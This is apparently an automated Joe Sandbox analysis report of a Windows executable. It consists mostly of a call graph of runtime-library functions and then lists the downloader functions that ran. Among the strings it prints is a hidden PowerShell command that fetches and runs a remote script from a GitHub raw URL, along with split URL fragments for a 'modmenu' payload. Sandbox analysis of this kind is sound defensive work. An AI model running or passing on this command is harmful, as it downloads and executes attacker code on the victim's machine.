Concurrency::cancel_current_task 42 API calls 17480->17484 17481->17478 17481->17480 17485 67829a std::_Facet_Register 42 API calls 17482->17485 17489 675faf _Yarn 17482->17489 17483->17489 17484->17489 17485->17489 17486 67ec03 std::ios_base::_Init 41 API calls 17488 676131 17486->17488 17487->17258 17489->17486 17490 676086 messages 17489->17490 17490->17258 17518 6761c5 17491->17518 17494 6761c5 std::_Lockit::_Lockit 7 API calls 17495 67474e 17494->17495 17524 67621d 17495->17524 17496 6747b8 17497 67621d std::_Lockit::~_Lockit 2 API calls 17496->17497 17499 6747f8 17497->17499 17501 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17499->17501 17500 67476e 17500->17496 17531 671bc0 17500->17531 17502 674812 17501->17502 17510 675ca0 17502->17510 17505 674816 17566 671880 17505->17566 17506 6747d0 17563 6764e6 17506->17563 17511 675ce7 17510->17511 17512 674460 42 API calls 17511->17512 17513 675d00 17511->17513 17512->17513 17514 672000 std::ios_base::_Init 42 API calls 17513->17514 17516 675de5 17514->17516 17515 674b57 17515->17472 17516->17515 17517 674580 42 API calls 17516->17517 17517->17515 17519 6761d4 17518->17519 17520 6761db 17518->17520 17572 67ecf4 17519->17572 17522 67472b 17520->17522 17577 677e91 EnterCriticalSection 17520->17577 17522->17494 17522->17500 17525 676227 17524->17525 17526 67ed02 17524->17526 17530 67623a 17525->17530 17629 677e9f LeaveCriticalSection 17525->17629 17630 67ecdd LeaveCriticalSection 17526->17630 17529 67ed09 17529->17500 17530->17500 17532 671c06 17531->17532 17533 671d5e 17531->17533 17532->17533 17534 67829a std::_Facet_Register 42 API calls 17532->17534 17533->17505 17533->17506 17535 671c16 17534->17535 17536 6761c5 std::_Lockit::_Lockit 7 API calls 17535->17536 17537 671c48 17536->17537 17538 671d77 17537->17538 17539 671c8a 17537->17539 17659 67638c 17538->17659 17631 676616 17539->17631 17550 671cd9 17551 671cf0 17550->17551 17553 67e8b9 __freea 14 API calls 17550->17553 17554 671d07 17551->17554 17555 67e8b9 __freea 14 API calls 17551->17555 17553->17551 17556 671d1e 17554->17556 17557 67e8b9 __freea 14 API calls 17554->17557 17555->17554 17558 671d35 17556->17558 17560 67e8b9 __freea 14 API calls 17556->17560 17557->17556 17559 671d4c 17558->17559 17561 67e8b9 __freea 14 API calls 17558->17561 17562 67621d std::_Lockit::~_Lockit 2 API calls 17559->17562 17560->17558 17561->17559 17562->17533 17564 67829a std::_Facet_Register 42 API calls 17563->17564 17565 6764f1 17564->17565 17565->17496 17567 67188e Concurrency::cancel_current_task 17566->17567 17568 6796fd CallUnexpected RaiseException 17567->17568 17569 67189c 17568->17569 17570 67949a ___std_exception_copy 41 API calls 17569->17570 17571 6718c3 17570->17571 17578 687156 17572->17578 17577->17522 17599 686b60 17578->17599 17598 687188 17598->17598 17600 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17599->17600 17601 686b76 17600->17601 17602 686b7a 17601->17602 17603 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17602->17603 17604 686b90 17603->17604 17605 686b94 17604->17605 17606 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17605->17606 17607 686baa 17606->17607 17608 686bae 17607->17608 17609 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17608->17609 17610 686bc4 17609->17610 17611 686bc8 17610->17611 17612 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17611->17612 17613 686bde 17612->17613 17614 686be2 17613->17614 17615 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17614->17615 17616 686bf8 17615->17616 17617 686bfc 17616->17617 17618 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17617->17618 17619 686c12 17618->17619 17620 686c16 17619->17620 17621 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17620->17621 17622 686c2c 17621->17622 17623 686c4a 17622->17623 17624 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17623->17624 17625 686c60 17624->17625 17626 686c30 17625->17626 17627 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17626->17627 17628 686c46 17627->17628 17628->17598 17629->17530 17630->17529 17664 67ef6b 17631->17664 17635 67663a 17636 67664a 17635->17636 17637 67ef6b std::_Locinfo::_Locinfo_ctor 68 API calls 17635->17637 17638 676470 _Yarn 14 API calls 17636->17638 17637->17636 17639 671c94 17638->17639 17640 677b78 17639->17640 17738 680744 17640->17738 17642 677b81 __Getctype 17643 677b9b 17642->17643 17644 677bb9 17642->17644 17743 680608 17643->17743 17646 680608 __Getctype 41 API calls 17644->17646 17647 677ba2 17646->17647 17748 680769 17647->17748 17650 671cad 17652 676661 17650->17652 17653 67666d 17652->17653 17654 671cc9 17652->17654 17655 67ef6b std::_Locinfo::_Locinfo_ctor 68 API calls 17653->17655 17654->17550 17656 67e8b9 17654->17656 17655->17654 17657 6847ff ___free_lconv_mon 14 API calls 17656->17657 17658 67e8d1 17657->17658 17658->17550 17769 6762e3 17659->17769 17663 6763ab 17665 687156 std::_Locinfo::_Locinfo_ctor 5 API calls 17664->17665 17666 67ef78 17665->17666 17673 67ed16 17666->17673 17669 676470 17670 67647e 17669->17670 17672 67648a _Yarn 17669->17672 17671 67e8b9 __freea 14 API calls 17670->17671 17670->17672 17671->17672 17672->17635 17674 67ed22 ___scrt_is_nonwritable_in_current_image 17673->17674 17681 67ec95 EnterCriticalSection 17674->17681 17676 67ed30 17682 67ed71 17676->17682 17681->17676 17707 67eed0 17682->17707 17684 67ed8c 17685 685bda __Getctype 41 API calls 17684->17685 17702 67ed3d 17684->17702 17686 67ed99 17685->17686 17731 687833 17686->17731 17689 684839 std::_Locinfo::_Locinfo_ctor 15 API calls 17691 67edea 17689->17691 17690 67ec20 __Getctype 11 API calls 17692 67eecf 17690->17692 17693 687833 std::_Locinfo::_Locinfo_ctor 43 API calls 17691->17693 17691->17702 17694 67ee06 17693->17694 17695 67ee0d 17694->17695 17696 67ee28 17694->17696 17697 67edc5 17695->17697 17698 67ee1f 17695->17698 17700 6847ff ___free_lconv_mon 14 API calls 17696->17700 17701 67ee53 17696->17701 17697->17690 17697->17702 17699 6847ff ___free_lconv_mon 14 API calls 17698->17699 17699->17702 17700->17701 17701->17702 17703 6847ff ___free_lconv_mon 14 API calls 17701->17703 17704 67ed65 17702->17704 17703->17702 17737 67ecdd LeaveCriticalSection 17704->17737 17706 676622 17706->17669 17708 67eedc 17707->17708 17709 67eeea 17707->17709 17711 682df9 std::_Locinfo::_Locinfo_ctor 65 API calls 17708->17711 17710 68747a std::_Locinfo::_Locinfo_ctor 43 API calls 17709->17710 17714 67ef01 17710->17714 17712 67eee6 17711->17712 17712->17684 17713 67ef60 17716 67ec20 __Getctype 11 API calls 17713->17716 17714->17713 17715 6847a2 __dosmaperr 14 API calls 17714->17715 17717 67ef1c 17715->17717 17718 67ef6a 17716->17718 17719 67ef44 17717->17719 17721 68747a std::_Locinfo::_Locinfo_ctor 43 API calls 17717->17721 17723 687156 std::_Locinfo::_Locinfo_ctor 5 API calls 17718->17723 17720 6847ff ___free_lconv_mon 14 API calls 17719->17720 17722 67ef59 17720->17722 17724 67ef33 17721->17724 17722->17684 17725 67ef78 17723->17725 17726 67ef46 17724->17726 17727 67ef3a 17724->17727 17729 67ed16 std::_Locinfo::_Locinfo_ctor 68 API calls 17725->17729 17728 682df9 std::_Locinfo::_Locinfo_ctor 65 API calls 17726->17728 17727->17713 17727->17719 17728->17719 17730 67efa1 17729->17730 17730->17684 17732 687847 _Fputc 17731->17732 17733 6874b7 std::_Locinfo::_Locinfo_ctor 43 API calls 17732->17733 17734 68785f 17733->17734 17735 67d880 _Fputc 41 API calls 17734->17735 17736 67edbe 17735->17736 17736->17689 17736->17697 17737->17706 17739 685bda __Getctype 41 API calls 17738->17739 17740 68074f 17739->17740 17741 684887 __Getctype 41 API calls 17740->17741 17742 68075f 17741->17742 17742->17642 17744 685bda __Getctype 41 API calls 17743->17744 17745 680613 17744->17745 17746 684887 __Getctype 41 API calls 17745->17746 17747 680623 17746->17747 17747->17647 17749 685bda __Getctype 41 API calls 17748->17749 17750 680774 17749->17750 17751 684887 __Getctype 41 API calls 17750->17751 17752 677bca 17751->17752 17752->17650 17753 680c12 17752->17753 17754 680c5a 17753->17754 17755 680c1f _Yarn 17753->17755 17754->17650 17755->17754 17760 68a456 17755->17760 17758 67ec20 __Getctype 11 API calls 17759 680c70 17758->17759 17761 68a464 17760->17761 17762 68a472 17760->17762 17761->17762 17766 68a48c 17761->17766 17763 680d0e __dosmaperr 14 API calls 17762->17763 17768 68a47c 17763->17768 17764 67ebf3 ___std_exception_copy 41 API calls 17765 680c53 17764->17765 17765->17754 17765->17758 17766->17765 17767 680d0e __dosmaperr 14 API calls 17766->17767 17767->17768 17768->17764 17775 671140 17769->17775 17772 6796fd 17773 679717 17772->17773 17774 679744 RaiseException 17772->17774 17773->17774 17774->17663 17780 67949a 17775->17780 17778 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17779 671187 17778->17779 17779->17772 17782 6794a7 _Yarn 17780->17782 17785 671177 17780->17785 17781 6794d4 17784 67e8b9 __freea 14 API calls 17781->17784 17782->17781 17782->17785 17786 684044 17782->17786 17784->17785 17785->17778 17787 684052 17786->17787 17788 684060 17786->17788 17787->17788 17793 684078 17787->17793 17789 680d0e __dosmaperr 14 API calls 17788->17789 17790 684068 17789->17790 17791 67ebf3 ___std_exception_copy 41 API calls 17790->17791 17792 684072 17791->17792 17792->17781 17793->17792 17794 680d0e __dosmaperr 14 API calls 17793->17794 17794->17790 17798 67634c 17795->17798 17803 67626f 17798->17803 17801 6796fd CallUnexpected RaiseException 17802 67636b 17801->17802 17804 671140 std::invalid_argument::invalid_argument 41 API calls 17803->17804 17805 676281 17804->17805 17805->17801 17807 673cac 17806->17807 17808 674460 42 API calls 17807->17808 17809 673cc7 17807->17809 17808->17809 17809->17374 17809->17377 17811 671f80 17810->17811 17811->17811 17812 674f20 std::ios_base::_Init 42 API calls 17811->17812 17813 671f94 17812->17813 17828 6713e0 17813->17828 17815 671fd0 messages 17815->17423 17816 671faa 17816->17815 17817 67ec03 std::ios_base::_Init 41 API calls 17816->17817 17819 671ffd 17817->17819 17818 672022 17818->17423 17819->17818 17820 6796fd CallUnexpected RaiseException 17819->17820 17821 672032 std::ios_base::_Init 17819->17821 17820->17821 17822 671f10 std::ios_base::_Init 42 API calls 17821->17822 17823 672068 17822->17823 17824 6796fd CallUnexpected RaiseException 17823->17824 17825 672077 17824->17825 17826 67949a ___std_exception_copy 41 API calls 17825->17826 17827 6720a4 17826->17827 17827->17423 17829 67144a 17828->17829 17830 67145e 17829->17830 17831 6716bc 17829->17831 17833 67148e 17830->17833 17837 6714cb 17830->17837 17838 6714d8 17830->17838 17841 671463 _Yarn 17830->17841 17832 6712e0 std::ios_base::_Init 42 API calls 17831->17832 17834 6716c1 17832->17834 17839 67829a std::_Facet_Register 42 API calls 17833->17839 17836 671240 Concurrency::cancel_current_task 42 API calls 17834->17836 17835 67152a 17847 675590 std::ios_base::_Init 42 API calls 17835->17847 17849 671592 _Yarn 17835->17849 17840 6716c6 17836->17840 17837->17833 17837->17834 17838->17841 17844 67829a std::_Facet_Register 42 API calls 17838->17844 17839->17841 17842 67ec03 std::ios_base::_Init 41 API calls 17840->17842 17841->17835 17843 675590 std::ios_base::_Init 42 API calls 17841->17843 17845 6716cb 17841->17845 17842->17845 17843->17835 17844->17841 17846 67ec03 std::ios_base::_Init 41 API calls 17845->17846 17848 6716d0 17846->17848 17847->17849 17858 6794fd 17848->17858 17849->17840 17854 6715ee messages 17849->17854 17850 67949a ___std_exception_copy 41 API calls 17852 67164f 17850->17852 17852->17845 17855 67167e messages 17852->17855 17853 6716f5 messages 17853->17816 17854->17850 17856 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17855->17856 17857 6716b3 17856->17857 17857->17816 17859 67950a 17858->17859 17861 679511 17858->17861 17860 67e8b9 __freea 14 API calls 17859->17860 17860->17861 17861->17853 17863 6821d5 17862->17863 17871 6821e6 17862->17871 17864 678f5b CallUnexpected GetModuleHandleW 17863->17864 17867 6821da 17864->17867 17867->17871 17873 682289 GetModuleHandleExW 17867->17873 17868 682224 17868->16476 17878 682073 17871->17878 17874 6822c8 GetProcAddress 17873->17874 17875 6822dc 17873->17875 17874->17875 17876 6822f8 17875->17876 17877 6822ef FreeLibrary 17875->17877 17876->17871 17877->17876 17879 68207f ___scrt_is_nonwritable_in_current_image 17878->17879 17893 67ec95 EnterCriticalSection 17879->17893 17881 682089 17894 6820c0 17881->17894 17883 682096 17898 6820b4 17883->17898 17886 68223f 17923 682270 17886->17923 17888 682249 17889 68225d 17888->17889 17890 68224d GetCurrentProcess TerminateProcess 17888->17890 17891 682289 CallUnexpected 3 API calls 17889->17891 17890->17889 17892 682265 ExitProcess 17891->17892 17893->17881 17896 6820cc ___scrt_is_nonwritable_in_current_image CallUnexpected 17894->17896 17895 682130 CallUnexpected 17895->17883 17896->17895 17901 683dd2 17896->17901 17922 67ecdd LeaveCriticalSection 17898->17922 17900 6820a2 17900->17868 17900->17886 17902 683dde __EH_prolog3 17901->17902 17905 683b2a 17902->17905 17904 683e05 codecvt 17904->17895 17906 683b36 ___scrt_is_nonwritable_in_current_image 17905->17906 17913 67ec95 EnterCriticalSection 17906->17913 17908 683b44 17914 683ce2 17908->17914 17913->17908 17915 683b51 17914->17915 17916 683d01 17914->17916 17918 683b79 17915->17918 17916->17915 17917 6847ff ___free_lconv_mon 14 API calls 17916->17917 17917->17915 17921 67ecdd LeaveCriticalSection 17918->17921 17920 683b62 17920->17904 17921->17920 17922->17900 17926 68be86 17923->17926 17925 682275 CallUnexpected 17925->17888 17927 68be95 CallUnexpected 17926->17927 17928 68bea2 17927->17928 17930 686dce 17927->17930 17928->17925 17931 686d49 std::_Locinfo::_Locinfo_ctor 5 API calls 17930->17931 17932 686dea 17931->17932 17932->17928 17934 683f96 ___scrt_uninitialize_crt 17933->17934 17935 683f84 17933->17935 17934->16569 17936 683f92 17935->17936 17938 67f591 17935->17938 17936->16569 17941 67f422 17938->17941 17944 67f316 17941->17944 17945 67f322 ___scrt_is_nonwritable_in_current_image 17944->17945 17952 67ec95 EnterCriticalSection 17945->17952 17947 67f32c ___scrt_uninitialize_crt 17948 67f398 17947->17948 17953 67f28a 17947->17953 17961 67f3b6 17948->17961 17952->17947 17954 67f296 ___scrt_is_nonwritable_in_current_image 17953->17954 17964 67f10d EnterCriticalSection 17954->17964 17956 67f2a0 ___scrt_uninitialize_crt 17957 67f2d9 17956->17957 17965 67f52c 17956->17965 17978 67f30a 17957->17978 18080 67ecdd LeaveCriticalSection 17961->18080 17963 67f3a4 17963->17936 17964->17956 17966 67f541 _Fputc 17965->17966 17967 67f553 17966->17967 17968 67f548 17966->17968 17981 67f4c3 17967->17981 17969 67f422 ___scrt_uninitialize_crt 70 API calls 17968->17969 17977 67f54e 17969->17977 17971 67d880 _Fputc 41 API calls 17973 67f58b 17971->17973 17973->17957 17975 67f574 17994 687c0d 17975->17994 17977->17971 18079 67f121 LeaveCriticalSection 17978->18079 17980 67f2f8 17980->17947 17982 67f503 17981->17982 17983 67f4dc 17981->17983 17982->17977 17987 685739 17982->17987 17983->17982 17984 685739 __fread_nolock 41 API calls 17983->17984 17985 67f4f8 17984->17985 18005 68842c 17985->18005 17988 68575a 17987->17988 17989 685745 17987->17989 17988->17975 17990 680d0e __dosmaperr 14 API calls 17989->17990 17991 68574a 17990->17991 17992 67ebf3 ___std_exception_copy 41 API calls 17991->17992 17993 685755 17992->17993 17993->17975 17995 687c1e 17994->17995 17998 687c2b 17994->17998 17996 680d0e __dosmaperr 14 API calls 17995->17996 18000 687c23 17996->18000 17997 687c74 17999 680d0e __dosmaperr 14 API calls 17997->17999 17998->17997 18001 687c52 17998->18001 18002 687c79 17999->18002 18000->17977 18046 687b6b 18001->18046 18003 67ebf3 ___std_exception_copy 41 API calls 18002->18003 18003->18000 18006 688438 ___scrt_is_nonwritable_in_current_image 18005->18006 18007 688479 18006->18007 18009 6884bf 18006->18009 18015 688440 18006->18015 18008 67eb76 _Fputc 29 API calls 18007->18008 18008->18015 18016 68bffb EnterCriticalSection 18009->18016 18011 6884c5 18012 6884e3 18011->18012 18017 68853d 18011->18017 18043 688535 18012->18043 18015->17982 18016->18011 18018 688565 18017->18018 18042 688588 __fread_nolock 18017->18042 18019 688569 18018->18019 18021 6885c4 18018->18021 18020 67eb76 _Fputc 29 API calls 18019->18020 18020->18042 18022 6885e2 18021->18022 18023 689d49 ___scrt_uninitialize_crt 43 API calls 18021->18023 18024 6880b9 ___scrt_uninitialize_crt 42 API calls 18022->18024 18023->18022 18025 6885f4 18024->18025 18026 6885fa 18025->18026 18027 688641 18025->18027 18030 688629 18026->18030 18031 688602 18026->18031 18028 6886aa WriteFile 18027->18028 18029 688655 18027->18029 18032 6886cc GetLastError 18028->18032 18028->18042 18034 68865d 18029->18034 18035 688696 18029->18035 18033 687c8a ___scrt_uninitialize_crt 47 API calls 18030->18033 18038 688051 ___scrt_uninitialize_crt 6 API calls 18031->18038 18031->18042 18032->18042 18033->18042 18036 688682 18034->18036 18037 688662 18034->18037 18039 688136 ___scrt_uninitialize_crt 7 API calls 18035->18039 18040 6882fa ___scrt_uninitialize_crt 8 API calls 18036->18040 18041 688211 ___scrt_uninitialize_crt 7 API calls 18037->18041 18037->18042 18038->18042 18039->18042 18040->18042 18041->18042 18042->18012 18044 68c01e ___scrt_uninitialize_crt LeaveCriticalSection 18043->18044 18045 68853b 18044->18045 18045->18015 18047 687b77 ___scrt_is_nonwritable_in_current_image 18046->18047 18059 68bffb EnterCriticalSection 18047->18059 18049 687b86 18057 687bcb 18049->18057 18060 68c0d2 18049->18060 18051 680d0e __dosmaperr 14 API calls 18053 687bd2 18051->18053 18052 687bb2 FlushFileBuffers 18052->18053 18054 687bbe GetLastError 18052->18054 18076 687c01 18053->18076 18073 680cfb 18054->18073 18057->18051 18059->18049 18061 68c0df 18060->18061 18062 68c0f4 18060->18062 18063 680cfb __dosmaperr 14 API calls 18061->18063 18064 680cfb __dosmaperr 14 API calls 18062->18064 18066 68c119 18062->18066 18065 68c0e4 18063->18065 18067 68c124 18064->18067 18068 680d0e __dosmaperr 14 API calls 18065->18068 18066->18052 18069 680d0e __dosmaperr 14 API calls 18067->18069 18071 68c0ec 18068->18071 18070 68c12c 18069->18070 18072 67ebf3 ___std_exception_copy 41 API calls 18070->18072 18071->18052 18072->18071 18074 685d2b __dosmaperr 14 API calls 18073->18074 18075 680d00 18074->18075 18075->18057 18077 68c01e ___scrt_uninitialize_crt LeaveCriticalSection 18076->18077 18078 687bea 18077->18078 18078->18000 18079->17980 18080->17963

                                                                                                  Executed Functions

                                                                                                  Function 006720D0 Relevance: 50.0, APIs: 19, Strings: 9, Instructions: 952networkfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,EBD99D41,?,?,?,00000000,0069349B,000000FF), ref: 00672143
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?), ref: 006721A9
                                                                                                  • InternetOpenW.WININET(Downloader,00000001,00000000,00000000,00000000), ref: 006721C3
                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 006721D9
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 0067228E
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0067229F
                                                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006722EF
                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00672337
                                                                                                  • InternetCloseHandle.WININET(?), ref: 00672355
                                                                                                  • InternetCloseHandle.WININET(?), ref: 0067235D
                                                                                                  Strings
                                                                                                  • api/main/modmenu.txt, xrefs: 006726EC
                                                                                                  • Downloader, xrefs: 006721B7
                                                                                                  • htt, xrefs: 0067261C
                                                                                                  • Error, xrefs: 00672578
                                                                                                  • ps://raw.githu, xrefs: 00672650
                                                                                                  • busercontent.c, xrefs: 00672684
                                                                                                  • Failed to start process., xrefs: 0067257D
                                                                                                  • powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', xrefs: 00672B35
                                                                                                  • om/labail300/ps, xrefs: 006726B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandle$ByteCharFileMultiOpenReadWide$ErrorLast
                                                                                                  • String ID: Downloader$Error$Failed to start process.$api/main/modmenu.txt$busercontent.c$htt$om/labail300/ps$powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'$ps://raw.githu
                                                                                                  • API String ID: 1121942590-1183403302
                                                                                                  • Opcode ID: b76dc99c1e0731084948920ba5faa662f11c3c2372c322ae4a43e01291041c9f
                                                                                                  • Instruction ID: 34be2f62eea7aa8726908712f13f95885e6c108fb50fe2435e95120aacf3c1fe
                                                                                                  • Opcode Fuzzy Hash: b76dc99c1e0731084948920ba5faa662f11c3c2372c322ae4a43e01291041c9f
                                                                                                  • Instruction Fuzzy Hash: B082DE719043459FD724CF24CC98BAEB7F6EF88300F10865DF599A7291DB70AA85CB92
                                                                                                  Function 006725F0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 226COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 6725f0-672727 call 674f20 * 5 243 67272d-67278c 232->243 244 672ddb 232->244 247 672792-67279d 243->247 248 67281a-672880 call 679770 * 2 243->248 245 672de0 call 671240 244->245 246 672ddb call 6712e0 244->246 257 672de5 call 67ec03 245->257 246->245 250 6727d3-6727e5 247->250 251 67279f-6727a9 247->251 272 672882-6728a9 call 679770 248->272 273 6728ab-6728b8 248->273 253 6727e7-6727ec 250->253 254 6727f4-6727f6 250->254 256 6727ac-6727b7 call 67829a 251->256 253->245 259 6727f2 253->259 260 672810 254->260 261 6727f8-67280e call 67829a 254->261 256->257 269 6727bd-6727d1 256->269 264 672dea call 67ec03 257->264 259->256 266 672812-672816 260->266 261->266 275 672def-672e43 call 67ec03 264->275 266->248 269->266 276 6728be-672928 272->276 273->276 277 6728b9 call 675590 273->277 292 672e45 275->292 293 672e4a-672e5c 275->293 279 672953-672960 276->279 280 67292a-672951 call 679770 276->280 277->276 282 672966-6729d0 279->282 283 672961 call 675590 279->283 280->282 288 6729d2-6729f9 call 679770 282->288 289 6729fb-672a08 282->289 283->282 290 672a0e-672a60 288->290 289->290 291 672a09 call 675590 289->291 298 672a62-672a6f 290->298 299 672a8f-672aab 290->299 291->290 292->293 296 672e62-672e67 293->296 297 672e5e-672e60 293->297 302 672e83 296->302 303 672e69-672e6b 296->303 304 672e85-672e91 297->304 305 672a85-672a8c call 6782ca 298->305 306 672a71-672a7f 298->306 300 672aad-672aba 299->300 301 672ada-672af6 299->301 307 672ad0-672ad7 call 6782ca 300->307 308 672abc-672aca 300->308 310 672b25-672b60 call 674f20 call 6723c0 301->310 311 672af8-672b05 301->311 302->304 303->302 309 672e6d-672e81 call 674460 303->309 312 672e97-672ec0 call 674b70 304->312 313 672f3b 304->313 305->299 306->257 306->305 307->301 308->257 308->307 309->304 335 672b62-672b6f 310->335 336 672b8f-672bc5 Sleep call 6720d0 310->336 317 672b07-672b15 311->317 318 672b1b-672b22 call 6782ca 311->318 337 672ed3-672f13 312->337 338 672ec2-672ec9 312->338 319 672f40-672f66 call 672000 call 67672b 313->319 317->257 317->318 318->310 343 672f6f-672f81 319->343 344 672f68-672f6a call 674580 319->344 340 672b85-672b8c call 6782ca 335->340 341 672b71-672b7f 335->341 354 672bc7-672bdf VirtualAlloc 336->354 355 672c04 336->355 337->319 338->337 352 672ecb-672ecf 338->352 340->336 341->264 341->340 345 672f83 343->345 346 672f88-672f9b 343->346 344->343 345->346 352->337 354->355 357 672be1-672bed call 679770 354->357 356 672c09-672c0b 355->356 358 672c0d-672c1b 356->358 359 672c3b-672c45 356->359 377 672bf2-672c02 VirtualFree 357->377 361 672c31-672c38 call 6782ca 358->361 362 672c1d-672c2b 358->362 363 672c77-672c9f 359->363 364 672c47-672c57 359->364 361->359 362->275 362->361 369 672cd3-672cdd 363->369 370 672ca1-672cb3 363->370 367 672c6d-672c74 call 6782ca 364->367 368 672c59-672c67 364->368 367->363 368->275 368->367 371 672d11-672d1b 369->371 372 672cdf-672cf1 369->372 375 672cb5-672cc3 370->375 376 672cc9-672cd0 call 6782ca 370->376 381 672d4f-672d59 371->381 382 672d1d-672d2f 371->382 379 672d07-672d0e call 6782ca 372->379 380 672cf3-672d01 372->380 375->275 375->376 376->369 377->356 379->371 380->275 380->379 388 672d5b-672d6d 381->388 389 672d89-672d93 381->389 386 672d45-672d4c call 6782ca 382->386 387 672d31-672d3f 382->387 386->381 387->275 387->386 390 672d7f-672d86 call 6782ca 388->390 391 672d6f-672d7d 388->391 392 672d95-672da7 389->392 393 672dc3-672dd8 call 678287 389->393 390->389 391->275 391->390 397 672db9-672dc0 call 6782ca 392->397 398 672da9-672db7 392->398 397->393 398->275 398->397
                                                                                                  APIs
                                                                                                    • Part of subcall function 00674F20: Concurrency::cancel_current_task.LIBCPMT ref: 00674FF6
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00672DE0
                                                                                                  Strings
                                                                                                  • api/main/modmenu.txt, xrefs: 006726EC
                                                                                                  • htt, xrefs: 0067261C
                                                                                                  • ps://raw.githu, xrefs: 00672650
                                                                                                  • busercontent.c, xrefs: 00672684
                                                                                                  • powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)', xrefs: 00672B35
                                                                                                  • om/labail300/ps, xrefs: 006726B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                  • String ID: api/main/modmenu.txt$busercontent.c$htt$om/labail300/ps$powershell -WindowStyle Hidden -Command start powershell -windowstyle h -args 'iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)'$ps://raw.githu
                                                                                                  • API String ID: 118556049-1603240466
                                                                                                  • Opcode ID: 72558b406803670da1c83a033d031d627d30411d618619e65e0ac30b8add504e
                                                                                                  • Instruction ID: b13a4eec9dd12fee488fffaaaccbf630dd3dc460e806956386b53e5c22c4ba59
                                                                                                  • Opcode Fuzzy Hash: 72558b406803670da1c83a033d031d627d30411d618619e65e0ac30b8add504e
                                                                                                  • Instruction Fuzzy Hash: 58B138704183818BE335DF24C855BABB7E2BFD9704F108A0DE59817291EBB59588CB97

                                                                                                  Non-executed Functions

                                                                                                  Function 0068EBB9 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
